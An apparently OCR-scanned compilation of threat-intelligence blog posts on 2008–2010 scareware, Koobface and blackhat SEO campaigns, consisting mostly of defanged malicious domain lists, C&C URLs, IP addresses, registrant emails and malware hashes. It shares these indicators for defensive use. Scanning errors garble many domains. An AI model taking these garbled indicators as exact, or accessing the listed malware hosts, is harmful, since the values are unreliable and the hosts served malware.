hxxp://xvcocxoiojfy. 5 nxs.com 

hxxp://zlj udyeaaunl.5nxs.com 

hxxp://woaabcoi usst.5nxs.com 

hxxp://d ppudpeeewmh.5nxs.com 

hxxp://zzh ustueequk.5nxs.com 

hxxp://qu boczoiolgd.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://kdwetmoi uics.5nxs.com 

hxxp://jgfudseeerqb. 5nxs.com 

hxxp://q unolhueeonx.5nxs.com 

hxxp://khd usyeaaeez.5nxs.com 



hxxp://bvci kg ueequx.5nxs.com 

hxxp://xzj upteaovzg.5nxs.com 

hxxp://rml udpueoebj.5nxs.com 

hxxp://pfyu pteeeauz.5nxs.com 

hxxp://qqreqnoeewhs.5nxs.com 

hxxp://ysfuy raaaczs.5nxs.com 

hxxp://ljd udyeaamcj.5nxs.com 

hxxp://vbvovzi iustm.5nxs.com 

hxxp://gffugd ueeibz.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://bnjdzkiu uyw.007gb.com 

hxxp://d pppdpeeeii.007gb.com 

hxxp://zzfd hdeeeoe.007gb.com 

hxxp://h hhhzciuusa.007gb.com 

hxxp://d pmlbkiuuta.007gb.com 

hxxp://ccgsg peaaev.007gb.com 

hxxp://vbzxecoi uso.007gb.com 

hxxp://n bkfhdeaack.007gb.com 

hxxp://bmvcaoeeaoe. 007gb.com 



hxxp://xchfgg iuewq.007gb.com 
hxxp://jgypg peaoxh.007gb.com 
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Sample malicious domains known to have 
participated in the campaign: 

hxxp://jgypg peaoxh.007gb.com 

hxxp://hdstpraoojd.007gb.com 

hxxp://n nkkvziiigh.007gb.com 

hxxp://q wyduquuoeo.007gb.com 

hxxp://j hgdkzooobn.007gb.com 

hxxp://ljyqweoi ihf.007gb.com 

hxxp://xzfdfsueaux.007gb.com 

hxxp://kjfhzj ueeae.007gb.com 

hxxp://tan buoeaanb.007gb.com 

hxxp://rammooaaocx. 007gb.com 

hxxp://g smxmlueoht.007gb.com 

hxxp://xxjg kg uueuu.007gb.com 

hxxp://jg ppfpeeaev.007gb.com 

hxxp://xzfpfpeaozh.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 



hxxp://khsphdueaev.007gb.com 

hxxp://wabn ieoiikg.007gb.com 

hxxp://rojshgeoisw.007gb.com 

hxxp://zl hffgueaec.007gb.com 

hxxp://q uxxmnoiokd.007gb.com 

hxxp://rpsd kzoeeqq.007gb.com 

hxxp://rozfksaoiht.007gb.com 

hxxp://vvzkcvi iuru.007gb.com 

hxxp://ptgdg hueedq.007gb.com 

hxxp://xvj hcliuufi.007gb.com 

hxxp://y wqntweaeqo.007gb.com 

hxxp://mu bwqaaaoxl.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://quzj lgueeib.007gb.com 

hxxp://fdyttteeaou.007gb.com 

hxxp ://xxjggseeeom.007gb.com 

hxxp://robvi moiikg.007gb.com 

hxxp://hgspsyeeanx.007gb.com 

hxxp ://n bzkckueein.007gb.com 



hxxp://syfdg moiipy.007gb.com 

hxxp://n mkjzjueequ.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://n mkjzjueequ.007gb.com 

hxxp://ytwqyteaaen.007gb.com 

hxxp://kgdfkhu uuyq.007gb.com 

hxxp://zbcvieaoocc.007gb.com 

hxxp://sywrdpeeeie. 007gb.com 

hxxp://prn mwaaaamm.007gb.com 

hxxp://djdd hfuuilc.007gb.com 

hxxp://wi bnuboiusw.007gb.com 

hxxp://mucl mboiigd.007gb.com 
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hxxp://vvl kevoiidy.007gb.com 

hxxp://xh prrteaaun.007gb.com 

hxxp://bncvoeaaauu.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://ravhzl uuewo.007gb.com 

hxxp://gsywptaaabz.007gb.com 



hxxp://xxkzbcoi ijd.007gb.com 

hxxp://mevi rwaaovlf.hostevo.com 

hxxp://roboxl oiihdt.007sites.com 

hxxp://rauon booozkf.007sites.com 

hxxp://ywi atreeewam.007sites.com 

hxxp://nxfetmaoolfr.007sites.com 

hxxp://g kmelbeuoear.007sites.com 

hxxp://mmcig sueeexg.007sites.com 

hxxp://vxxi ljoioxxg.10fast.net 

hxxp://jgsuspeeeaic. 10fast.net 

hxxp://qenocxi iihsr.10fast.net 

hxxp ://l kl ill iiigdt.10fast.net 

hxxp ://hgdepreaamzs. 10fast.net 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://gffu pteaaebj.10fast.net 

hxxp:///kljigfuuugfp.lOfast.net 

hxxp ://rai anvoiokgy.10fast.net 

hxxp://rtqerqeaamcg. 10fast.net 

hxxp ://gfdu gdeaavls.10fast.net 



hxxp://ddterboi ugsr.10fast.net 

hxxp://jgpewnoi ihpq.10fast.net 

hxxp://kjfpfseeeqo.007gb.com 

hxxp://wu bcmciuuya.007gb.com 

hxxp://quzkxvooift.007gb.coml 

hxxp://n blhlheaaum.007gb.com 

hxxp://cclxnci uupq.007gb.com 

hxxp://n bhkckueeib.007gb.com 

hxxp://hgddxl iuudp.007gb.com 

hxxp://wi nilhueuwiz.10fast.net 

hxxp://queocl iuupqv.10fast.net 

hxxp://g dtaqboiihhs.10fast.net 

hxxp://bbvovbaaa ncg.10fast.net 

hxxp://fpramvoi iftm.10fast.net 

hxxp://fj I iljiiizhp.10fast.net 

hxxp://gspedpeeeiel.lOfast.net 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://fssu kjaoanbx.5nxs.com 

hxxp://ptaa wviuuppw.5nxs.com 



hxxp ://l lxozkoiikdq.5nxs.com 
hxxp://kkkijguuuquz.5 nxs.com 
hxxp ://womobci iiftn.5nxs.com 
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hxxp ://vvci kg ueequl.5nxs.com 
hxxp ://zzzoxcooozzl. 5 nxs.com 
hxxp ://wu uocziuupwn.5nxs.com 
hxxp ://hfyeq noiiftm.5nxs.com 
hxxp ://sttewboookgy. 5 nxs.com 
hxxp ://g hhusteaozgt.5nxs.com 
hxxp ://fjzoqtu uukiw.5nxs.com 
hxxp ://mu uaqciueomz.5nxs.com 
hxxp ://fsfugd uuutav.5nxs.com 
hxxp ://j gdeywaoocks.5nxs.com 
hxxp://rani ljuuurix.5nxs.com 
hxxp ://pabi khueamcg.5nxs.com 
hxxp ://g steqbooikdr.5nxs.com 
hxxp ://l I hugfuuerab.5nxs.com 
hxxp://dspeyyeeeauv.5nxs.com 
hxxp ://xzkixhu aoczg.5nxs.com 



hxxp ://rouawmaaammz. 5 nxs.com 

hxxp://kxl ijjiuuspt.5nxs.com 

hxxp ://xzl iljiuifyw.5nxs.com 

hxxp://vvvi lhiueqac.5nxs.com 

hxxp ://tovi khiiufdt.5nxs.com 

hxxp ://ttretreeu hgs.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://y pserreeuytq.5nxs.com 

hxxp ://xxzij kiiikkf.5nxs.com 

hxxp ://bvzoknaoi gpm.5nxs.com 

hxxp ://n nxihduuutqv.5nxs.com 

hxxp ://muzi dyeeeevh.5nxs.com 

hxxp ://tpd ufhiiidrn.5nxs.com 

hxxp://ffpu pteeeaqd.5nxs.com 

hxxp ://bbxigseeol pm. 5 nxs.com 

hxxp://gsdug peaeibj.5nxs.com 

hxxp ://pwteyyeaamcg. 5 nxs.com 

hxxp ://zxcolj iiigpw.5nxs.com 

hxxp ://bmacxoi ixjs.5nxs.com 



hxxp://twqawmaooczf. 5 nxs.com 

hxxp://bbrartuau hjh.5nxs.com 

hxxp://dti olhueeexd.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://gddu hgiiikhd.5nxs.com 

hxxp://ryqu hfuuuypr.5nxs.com 

hxxp://sfh ijkiuusrn.5nxs.com 

hxxp://staen naoolgy.5nxs.com 

hxxp://vvvoczooolzg. 5 nxs.com 

hxxp://bmnokg ueequz.5nxs.com 

hxxp://proocxoi igds.5nxs.com 

hxxp://ptwepwaoozht.5 nxs.com 

hxxp://fsdufpeeeovg.5nxs.com 
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hxxp://dtl id woiuyoz.5nxs.com 
hxxp://kvyamboi uhsr.5nxs.com 
hxxp://kvmard ioetyp.5nxs.com 
hxxp://tan iljueuwul.5nxs.com 
hxxp://j vnartuuixvx.5nxs.com 



hxxp://qu bijgiuutac.5nxs.com 

Sample malicious domains known to have 
participated in the campaigns: 

hxxp://qeboczi uidfy.10fast.net 

hxxp://gffudpeeeauc. 10fast.net 

hxxp ://v bj u sta i u rox. 1 Ofast. n et 

hxxp://jgyu ptaoutic.10fast.net 

hxxp ://l khighueeevk.10fast.net 

hxxp://ptpudreeeobz. 10fast.net 

hxxp ://meeambaooxls. 10fast.net 

hxxp ://y rreyraaovld.10fast.net 

hxxp ://kkd utwaoobzd.10fast.net 

hxxp ://czxitbou uquz.10fast.net 

hxxp ://l vbovnaoozjp.10fast.net 

hxxp ://wi iambaookdt.10fast.net 

hxxp ://zxkij gueaecg.10fast.net 

hxxp ://y wqawqaoovzh.10fast.net 

hxxp ://gzou kwuuizbv.10fast.net 

hxxp://roiabcoi igpq.10fast.net 

hxxp ://vvl ufseaavld.10fast.net 



hxxp://hg pusyeaamxg.10fast.net 

hxxp://kkki kziiifyq.10fast.net 

hxxp://dtq aczoiuswb.10fast.net 

hxxp://l lzozxoiigpw.10fast.net 

hxxp://n mcijkiuuobg.10fast.net 

hxxp://mnxij liuusrm.10fast.net 

hxxp://q uuanbooikfy.10fast.net 

hxxp://xxzij huueuex.10fast.net 

hxxp://gsyepyeaau bk.10fast.net 

hxxp://tqoaqmaoigsr. 10fast.net 

hxxp://cvboczi iikgp.10fast.net 

hxxp://gdyepteaancj. 10fast.net 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://q ibocziuewuz.10fast.net 

hxxp://q rkargoaatsf.10fast.net 

hxxp://zzdey maoifyq.10fast.net 

hxxp://noeancoi utac.10fast.net 

hxxp://q unovnaaammb.10fast.net 

hxxp://gffugdeeei bk.10fast.net 



hxxp://cmvijsueen Is. 10fast.net 
hxxp://tqaeryeaanxj. 10fast.net 
hxxp://xmua mbiiifyt.10fast.net 
hxxp://cvnan neeesff.10fast.net 
hxxp://mu uaqbooolfy.10fast.net 
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hxxp://q imacvaaetyr.10fast.net 
hxxp://vxfutqaoi hsw.10fast.net 
hxxp://y wreyruuuhhg.10fast.net 
hxxp://fdteyteeeoel. 10fast.net 
hxxp://y wianvoiupwc.10fast.net 
hxxp://zl geyraoobls.10fast.net 
hxxp ://zkhujdeaoj pm. 10fast.net 
hxxp://kjfufd uuutqm.10fast.net 
hxxp ://xxj udpueewiz.10fast.net 
hxxp ://rooewmeaa meg. 10fast.net 
hxxp ://hffugd ueeink.10fast.net 
hxxp ://xmcoxzoi ikkd.10fast.net 
hxxp ://l 11 izkuiifyq.10fast.net 
hxxp ://xmua psuiovnb.10fast.net 



hxxp://tq uanvoiuyqv.10fast.net 
hxxp://kvnartu uujlk.10fast.net 
hxxp://l I likhioozjf.10fast.net 
hxxp://y rreypeeamck.10fast.net 
hxxp://g I hihfueaeck.10fast.net 

Sample malicious domains known to have participate 
in the campaign: 

hxxp://goadult.info/go.php?sid = 13 -> -> 
hxxp://goadult.info/go.php?sid=9 - &gt -> 
hxxp://r2606.com/go/?pid = 30937 

-> which is a well known Koobface 1.0 command and control 
server domain. 

Related malicious redirectors known to have 
participated in the campaign: 

hxxp://goadult.info - 78.109.28.16 - tech@goadult.info 

hxxp://golgo.net - 174.36.214.32 - tech@golgo.net 

hxxp://wpills.info - 174.36.214.3 - Email: tech@wpills.info 
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Historical OSINT - Latvian ISPs, Scareware, and the 
Koobface Gang Connection (2018-10-20 22:34) 

It's 2010 and we've recently stumbled upon yet another 
malicious and fraudulent campaign courtesy of the Koobface 



gang actively serving fake security software also known as 
scareware to a variety of users with the majority of 

malicious software conveniently parked within 
79.135.152.101 - AS2588, LatnetServiss-AS LATNET ISP 
successfully 

hosting a diverse portfolio of fake security software. 

In this post, I'll provide actionable intelligence on the 
infrastructure behind the campaign and discuss in-depth 

the tactics techniques and procedures of the cybercriminals 
behind it. 

Sample malware known to have participated in the 
campaign: 

installed.exe - MD5: 4ab2cb0dd839df64ec8d682f904827ef 
- Trojan.Crypt.ZPACK.Gen; Mal/FakeAV-CQ - Result: 9/40 

(22.50 %) 

Related malicious phone back C &C server IPs: 

hxxp://av-pl usonline.org/install/avplus.dll 

hxxp://av-plusonline.org/cb/real.php?id = 

Related malicious MD5s known to have participated 
in the campaign: 

avplus.dll - MD5: 57c79fb723fcbf4d65f4cd44e00ff3ed - 
FakeAlert-LF; Mal/FakeAV-CL - Result: 6/39 (15.39 %) 

It's gets even more interesting as hxxp://fast- 
payments.com - 91.188.59.27 is parked within Koobface 
bot- 



net's 1.0 phone back locations (hxxp://urodinam.net) and 
is also hosted within the same netblock at 91.188.59.10. 

Sample related malicious URLs known to have 
participated in the campaign: 

hxxp ://u rod i nam.net/33t. php?stime= 12 5558 

- hxxp://91.188.59.10/opa.exe -MD5: 
d4aacc8d01487285be564cbd3a4abc76 - 
Downloader.VB.7.S; Mal/Koobface-B - 

Result: 10/40 (25 %) 

Once executed a sample malware phones back to the 
following malicious C &C server IPs: 

hxxp://aburvalg.com/newl.php - 64.27.0.237 

- hxxp://fucking-tube.net 

The following domains use it as a name server: 

hxxp ://nsl.addedantivirus.com 

Related malicius domains known to have responded 
to the same malicious name server: 

hxxp ://a ntiviralpluss.org 

hxxp ://a ntivirspluss.org 

hxxp ://avon I inescanerr.org 

hxxp ://on I ine-scannerr.org 

hxxp ://on I inescanerr.org 

hxxp ://on I inescannerr.org 



hxxp://pretection-page.org 
hxxp://sys-mesage.org 
hxxp://av-pl us-on I ine.org 
hxxp://av-pl usonline.org 
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hxxp://avpl us-on I ine.org 
hxxp://avpl usonline.org 
hxxp://avpl ussonline.org 
hxxp://protecmesages.org 
hxxp://protect-mesagess.org 
hxxp://protectmesages.org 
hxxp://protectmesagess.org 
hxxp://protectmessages.org 
hxxp://avplus24su pport.com 
hxxp://sea rchwebway4.com 
hxxp://sea rchwebway5.com 
hxxp://sea rchwebwaylO.com 
hxxp://sea rchwebway9.com 
hxxp://sea rchwebway6.com 



Related malicious URLs known to have participated in 
the campaign: 

hxxp://avplus-online.org/buy.php?id = 

- hxxp://fast-payments.com/index.php?prodid = antivirplus 
02 01 &afid = 

Related malicious domains known to have 
participated in the campaign: 

hxxp://a ntiviruspluss.org 

hxxp://avplusscan ner.org 

hxxp://protection-messag.org 

hxxp://a ntivirs-pluss.org 

hxxp://a ntiviru-pluss.org 

hxxp://a ntivirus-pluss.org 

hxxp://protection-mesage.org 

hxxp://sysstem-mesage.org 

hxxp://system-message.org 

hxxp://a ntiviral-pluss.org 

hxxp://av-on I inescanner.org 

hxxp://avon I inescanner.org 

hxxp://avon I inescannerr.org 

hxxp://avp-scan ner.org 



hxxp://avp-scan nerr.org 
hxxp://avp-sscaner.org 
hxxp://avp-sscan nerr.org 
hxxp://avplscaner-on I ine.org 
hxxp ://avplscanerr-on I ine.org 
hxxp://avplsscan nerr.org 
hxxp://avplus-scanerr.org 
hxxp ://on I ine-protection.org 
hxxp ://a ntivirupluss.org 
hxxp://syssmessage.org 
hxxp ://avon I inescanerr.org 
hxxp ://on I ine-scannerr.org 
hxxp ://on I inescanerr.org 
hxxp ://on I inescannerr.org 
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hxxp ://av-scanal ly.org 
hxxp ://av-scaner-on I ine.org 
hxxp ://av-scaner-on I ine3k.org 
hxxp ://av-scaner-on I ineband.org 
hxxp ://av-scaner-on I inebody.org 



hxxp://av-scaner-on I inebuzz.org 
hxxp://av-scaner-on I inecabin.org 
hxxp://av-scaner-on I inecrest.org 
hxxp://av-scaner-on I inefolk.org 
hxxp://av-scaner-on I ineplan.org 
hxxp://av-scaner-on I inesite.org 
hxxp://i av-scaner-online.org 
hxxp://netav-scaner-on I ine.org 
hxxp://techav-sca ner-online.org 
hxxp://a ntivirspluss.org 
hxxp://sys-mesage.org 
hxxp://a ntiviralpluss.org 
hxxp://pretection-page.org 
hxxp://av-scaner-on I inefairy.org 
hxxp://av-scaner-on I inegrinder.org 
hxxp://av-scaner-on I inehistory.org 
hxxp://av-scaner-on I ineicity.org 
hxxp://av-scaner-on I inemachine.org 
hxxp://av-scaner-on linepeople.org 
hxxp://av-scaner-on I ineretort.org 



hxxp://av-scaner-on I inereview.org 
hxxp://av-scaner-on I inetopia.org 
hxxp://d irectav-scaner-online.org 
hxxp://expertav-scaner-on I ine.org 
hxxp://orderav-scaner-on I ine.org 
hxxp://speedyav-scaner-onl ine.org 
hxxp://thriftyav-scaner-on I ine.org 
hxxp://ti mesav-scaner-online.org 
hxxp://4 lion I ine-scanner-free.org 
hxxp://dynaon I ine-scanner-free.org 
hxxp://faston I ine-scanner-free.org 
hxxp://homeon I ine-scanner-free.org 
hxxp://on I ine-scanner-freebin.org 
hxxp://on I ine-scanner-freebuy.org 
hxxp://on I ine-scanner-freelook.org 
hxxp://on I ine-scanner-freemap.org 
hxxp://on I ine-scanner-freemeet.org 
hxxp://on I ine-scanner-freesite.org 
hxxp://on I ine-scanner-freetent.org 
hxxp://on I ine-scanner-freeu.org 




hxxp://on I ine-scanner-freevolt.org 
hxxp://on I inescannerfree.org 
hxxp://av-pl us-on I ine.org 
hxxp://protecmesages.org 
hxxp://av-on I icity.org 
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hxxp://av-on I ine-scanner.org 
hxxp://av-on I ine-scannerbid.org 
hxxp://av-on I ine-scannercrest.org 
hxxp://av-on I ine-scannerfolk.org 
hxxp://av-on I ine-scannergate.org 
hxxp://av-on I ine-scannerland.org 
hxxp://av-on I ine-scannerpc.org 
hxxp://av-on I ine-scannersite.org 
hxxp://av-on I ine-scannerweek.org 
hxxp://av-on I ine-scannerwing.org 
hxxp://i nfoav-online-scanner.org 
hxxp://shopav-on I ine-scanner.org 
hxxp://theav-on I ine-scanners.org 
hxxp://avplus-on I ine.org 




hxxp://protectmesages.org 
hxxp://av-scaner.org 
hxxp://av-scaners.org 
hxxp://av-scan ner.org 
hxxp://av-scan ners.org 
hxxp://avpl ussonline.org 
hxxp://avscaner.org 
hxxp://avscaners.org 
hxxp://avscan ner.org 
hxxp://avscan ners.org 
hxxp://eav-scaner.org 
hxxp://eav-scaners.org 
hxxp://eav-scan ner.org 
hxxp://eav-scan ners.org 
hxxp://myav-scaner.org 
hxxp://myav-scaners.org 
hxxp://myav-scan ner.org 
hxxp://myav-scan ners.org 
hxxp://protectmessages.org 
hxxp://avpl usonline.org 



hxxp://av-pl usonline.org 
hxxp://protect-mesagess.org 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - Massive Scareware Dropping 
Campaign Spotted in the Wild (2018-10-20 22:38) 

It's 2008 and I've recently spotted a currently circulating 
malicious and fraudulent scareware-serving malicious 

domain portfolio which I'll expose in this post with the idea to 
share actionable threat intelligence with the security 

community further exposing and undermining the 
cybercrime ecosystem the way we know it potentially 
empowering 

security researchers and third-party vendors with the 
necessary data to stay ahead of current and emerging 
threats. 

Related malicious domains known to have 
participated in the campaign: 

hxxp ://50virus-scan ner.com 

hxxp://700vi rus-scanner.com 

hxxp ://a ntivirus-test66.com 

hxxp ://a ntivirus200scanner.com 

hxxp ://a ntivirus600scanner.com 



hxxp://a ntivirus800scanner.com 
hxxp://a ntivirus900scanner.com 
hxxp://av-scan ner200.com 
hxxp://av-scan ner300.com 
hxxp://av-scan ner400.com 
hxxp://av-scan ner500.com 
hxxp://i netproscan031.com 
hxxp://i nternet-scan020.com 
hxxp://novi rus-scanOO.com 
hxxp://stopvi rus-scanll.com 
hxxp://stopvi rus-scanl3.com 
hxxp://stopvi rus-scanl6.com 
hxxp://stopvi rus-scan33.com 
hxxp ://virus66scan ner.com 
hxxp://vi rus77scanner.com 
hxxp ://vi rus88scanner.com 
hxxp ://a ntivirus-scan200.com 
hxxp ://a ntispy-scan200.com 
hxxp ://av-scan ner200.com 
hxxp ://av-scan ner300.com 



hxxp://a ntivirus-scan400.com 
hxxp://a ntispy-scan400.com 
hxxp://av-scan ner400.com 
hxxp://av-scan ner500.com 
hxxp://a ntivirus-scan600.com 
hxxp://antispy-scan600.com 
hxxp://a ntivirus-scan700.com 
hxxp://a ntispy-scan700.com 
hxxp://av-scan ner700.com 
hxxp://antispy-scan800.com 
hxxp://a ntivirus-scan900.com 
hxxp://novi rus-scan00.com 
hxxp://stop-vi rus-010.com 
hxxp://spy warescan010.com 
hxxp://a ntispywarehelp010.com 
hxxp://i nternet-scan020.com 
hxxp://i nternet-scanner020.com 
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hxxp://i nsight-scan20.com 
hxxp://i nternet-scanner030.com 



hxxp://stop-vi rus-040.com 
hxxp://i nternet-scan040.com 
hxxp://i nsight-scan40.com 
hxxp://i nternet-scan050.com 
hxxp://i nternet-scanner050.com 
hxxp://i nsight-scan60.com 
hxxp://stop-vi rus-070.com 
hxxp://i nternet-scan070.com 
hxxp://i nternet-scanner070.com 
hxxp://i nsight-scan80.com 
hxxp://stop-virus-090.com 
hxxp://i nternet-scan090.com 
hxxp://i nternet-scanner090.com 
hxxp://i nsight-scan90.com 
hxxp://a ntispywarehelpkO.com 
hxxp://i netproscan001.com 
hxxp://novi rus-scan01.com 
hxxp://spyware-stop01.com 
hxxp://a ntivirus-inet01.com 
hxxp://stopvi rus-scanll.com 



hxxp ://i netproscan031.com 
hxxp://novi rus-scan31.com 
hxxp ://a ntivirus-inet31.com 
hxxp ://novi rus-scan41.com 
hxxp ://a ntivirus-inet41.com 
hxxp ://a ntivirus-inet51.com 
hxxp ://i netproscan061.com 
hxxp ://novi rus-scan61.com 
hxxp ://i netproscan081.com 
hxxp ://novi rus-scan81.com 
hxxp ://i netproscan091.com 
hxxp://spyware-stopbl.com 
hxxp ://spy ware-stopml.com 
hxxp://spyware-stopnl.com 
hxxp://spyware-stopzl.com 
hxxp ://a ntispywarehelp002.com 
hxxp ://a ntispywarehelp022.com 
hxxp ://novi rus-scan22.com 
hxxp ://a ntispywarehelpk2.com 
hxxp ://i nsight-scanner2.com 



hxxp://spywarescan013.com 
hxxp://stopvi rus-scanl3.com 
hxxp://novi rus-scan33.com 
hxxp://stopvi rus-scan33.com 
hxxp://a ntispywarehelp004.com 
hxxp://a ntispywarehelpk4.com 
hxxp://spywarescan015.com 
hxxp://novi rus-scan55.com 
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hxxp://i nsight-scanner5.com 
hxxp://stopvi rus-scanl6.com 
hxxp://stopvi rus-scan66.com 
hxxp://a ntispywarehelpk6.com 
hxxp://spy warescan017.com 
hxxp://i nsight-scanner7.com 
hxxp://a ntispywarehelp008.com 
hxxp://spy warescan018.com 
hxxp://stopvi rus-scanl8.com 
hxxp://novi rus-scan88.com 
hxxp://stopvi rus-scan88.com 



hxxp://a ntivirus-test88.com 
hxxp://a ntispywarehelpk8.com 
hxxp://i nsight-scanner8.com 
hxxp://i nsight-scanner9.com 
hxxp://l Oscanantispyware.com 
hxxp://2 Oscanantispyware.com 
hxxp://30scanantispyware.com 
hxxp://60scanantispyware.com 
hxxp://80scanantispyware.com 
hxxp://2 scanantispyware.com 
hxxp ://3scanantispy ware, com 
hxxp ://5scanantispy ware, com 
hxxp ://7scanantispy ware.com 
hxxp ://8scanantispy ware, com 
hxxp ://spy ware200scan.com 
hxxp://spyware500scan.com 
hxxp://spyware800scan.com 
hxxp://spyware880scan.com 
hxxp ://50vi rus-scanner.com 
hxxp ://90vi rus-scanner.com 



hxxp://a ntivirus900scanner.com 



hxxp://anti viruslOscanner.com 
hxxp://vi rus77scanner.com 
hxxp://vi rus88scanner.com 
hxxp://net00 lantivirus.com 
hxxp://netO llantivirus.com 
hxxp://netl llantivirus.com 
hxxp://net02 lantivirus.com 
hxxp ://net-02anti virus.com 
hxxp://net2 2 2antivirus.com 
hxxp ://net-04anti virus.com 
hxxp ://net-05anti virus.com 
hxxp ://net-07anti virus.com 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Malware Domains Impersonating 
Google (2018-10-20 22:51) 

lt"s 2008 and I've recently stumbled upon a currently active 
typosquatted portfolio of malware-serving domains suc¬ 
cessfully impersonating Google further spreading malicious 
software to hundreds of thousands of unsuspecting users. 



In this post I'll provide actionable intelligence on the 
infrastructure behind the campaign. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://google-analyse.com/in.cgi?default 

hxxp://google-analystic.com/in.cgi 

hxxp://google-analysis.com/cgi-bin/nspl5/in.cgi?p = in 

hxxp://google-analystic.net 

hxxp://google-counter.com/cgi-bin/nspl?p = in 

hxxp://goog I erank. info/counter/ 

hxxp://googlehlp.com 

hxxp://pagead2.googlesynidication.com 

hxxp://service-google.cn 

hxxp://l.ie-goog le.cn 

hxxp://analystic.cn/in.cgi?default 

hxxp://255-goog I e-video, info 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild (2018-10-21 22:35) 



It's 2008 and I recently came across to a pretty decent 
portfolio of rogue and fraudulent malicious scareware¬ 
serving 

domains successfully acquiring traffic through a variety of 
black hat SEO techniques in this particular case the airplane 

crash of the Polish president. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://sarahscand ies.com 

hxxp://armadasur.com 

hxxp://gay ribisi.com 

hxxp://composerjohn beal.com 

hxxp://preferredtempsi nc.com 

hxxp://ojaivalleyboys.com 

hxxp://homel inkmag.com 

hxxp://world widestones.com 

hxxp://si I si I aqasmia.com 

hxxp://vidoemo.com 

hxxp://chann hu.com 

hxxp ://i deasenfoco.com 

Related malicious domains known to have 
participated in the campaign: 



hxxp://homeownersmoneysaver.com 

hxxp://preferredtempsi nc.com 

hxxp://sarahscand ies.com 

hxxp://chann hu.com 

hxxp ://i ntheclub.com 

hxxp://i nternetcabinetsdirect.com 

hxxp ://si lentservers.com 

hxxp://ojaivalleyboys.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp ://i ndigo-post.com 

hxxp ://j acksonareadiscgolf.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp ://werod ink.com 

hxxp ://j ingyi-plastic.com 

hxxp ://i mpressionsphotographs.com 

Sample URL redirection chain: 

hxxp://cooldesig ns4u.co.uk/sifr.php 

- hxxp://visittds.com/su/in.cgi?2 - 213.163.89.55 - Emai 
johnvernet@gmail.com 



- hxxp://scaner24.org/?affid = 184 - 91.212.127.19 - Email 
bobarter@xhotmail.net 

Redirectors parked on 213.163.89.55 (AS49544, 
INTERACTIVE3D-AS lnteractive3D) include: 

hxxp://google-analyze.org 

hxxp://al ioanka.com 
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hxxp://robokasa.com 

hxxp://thekapita.com 

hxxp://rbomce.com 

hxxp://kol koman.com 

hxxp://nikiten.com 

hxxp://rokobon.com 

hxxp://od ile-marco.com 

hxxp://ra mualdo.com 

hxxp://omi ardo.com 

hxxp://nsfer.com 

hxxp://racotas.com 

hxxp://foxtris.com 

hxxp://mongoit.com 

hxxp://mangasit.com 



hxxp://con vart.com 

hxxp://bai dustatz.com 

hxxp://google-analyze.cn 

hxxp://statanalyze.cn 

hxxp://reycross.cn 

hxxp://m-analytics.net 

hxxp://yahoo-analytics.net 

We've already seen hxxp://google-analyze.org and 
hxxp://yahoo-analytics.net in several related [l]mass com¬ 
promise of related Embassy Web Sites. 

We'll continue monitoring the campaign and post updates 
as new developments take place. 

1. https://ddanchev.blo as oot.com/2Q17/Q5/historical-osint- 
i nside-2007-2009.html 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild - Part Two (2018-10-21 22:47) 

It's 2008 and I've recently came across to a massive black 
hat SEO campaign successfully enticing users into falling 

victim into fraudulent and malicious sea reware-serving 
campaign. In this post I'll provide actionable intelligence on 

the infrastructure behind it. 





Related malicious domains and redirectors known to 
have participated in the campaign: 

hxxp://msh-co.com 

hxxp://i ncubatedesign.com 

hxxp://i ncubatedesign.com 

hxxp://l ancemissionart.com 

hxxp://aud ioboxstudios.com 

hxxp://h whitecustomhomes.com 

hxxp://i ndobestroof.com 

hxxp://in-prague.com 

hxxp://h vmpglobalconsulting.com 

hxxp://i ndierthanthou.com 

hxxp://h uckleberryroad.com 

hxxp://i ndiepoprockhop.com 

hxxp://i ndianfriends.org 

hxxp://h whitecustomhomes.com 

hxxp://h usuzem.com 

hxxp://h usuzem.com 

hxxp://sean kobuk.com 

hxxp://in-led.net 



hxxp://pel laiowahomes.com 

hxxp://i-leadzsite.com 

hxxp://sean kobuk.com 

hxxp://i4z.com 

hxxp://i n-prague.com 

hxxp://tmnttoys.com 

hxxp://h ulshizer.com 

hxxp://aud ioboxstudios.com 

hxxp://msh-co.com 

hxxp://i-leadzsite.com 

hxxp://h ulshizer.com 

hxxp://msh-co.com 

hxxp://i ndierthanthou.com 

hxxp://nei ghborhoodnursingcare.com 

hxxp://i4004.net 

hxxp://ndiepoprockhop.com 

hxxp://pugzor.net 

hxxp://i ndiepoprockhop.com 

hxxp://in-turkey.info 

hxxp://h whitecustomhomes.com 



hxxp://salsaspice.com 
hxxp://cal idogrocks.com 
hxxp://i ncubatedesign.com 
hxxp://iac-tokyo.org 
hxxp://h uckleberryroad.com 
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hxxp://in-prague.com 

hxxp://h ulshizer.com 

hxxp://nei ghborhoodnursingcare.com 

hxxp ://indi go.earth man.ca 

hxxp://backya rdcreations.org 

hxxp ://u raband.com 

hxxp ://h uckleberryroad.com 

hxxp ://i ndobestroof.com 

hxxp://i ndiepoprockhop.com 

hxxp://iac-tokyo.org 

hxxp ://i ndiansexhq.com 

hxxp ://cal idogrocks.com 

hxxp ://the-flooring-connection.com 

hxxp://pugzor.net 



hxxp://the-flooring-connection.com 

hxxp://i n-prague.com 

hxxp://iac-tokyo.org 

hxxp://h umordehoy.com 

hxxp://msh-co.com 

hxxp://pel laiowahomes.com 

hxxp://salsaspice.com 

hxxp://l ancemissionart.com 

hxxp://i ncubatedesign.com 

hxxp://iac-tokyo.org 

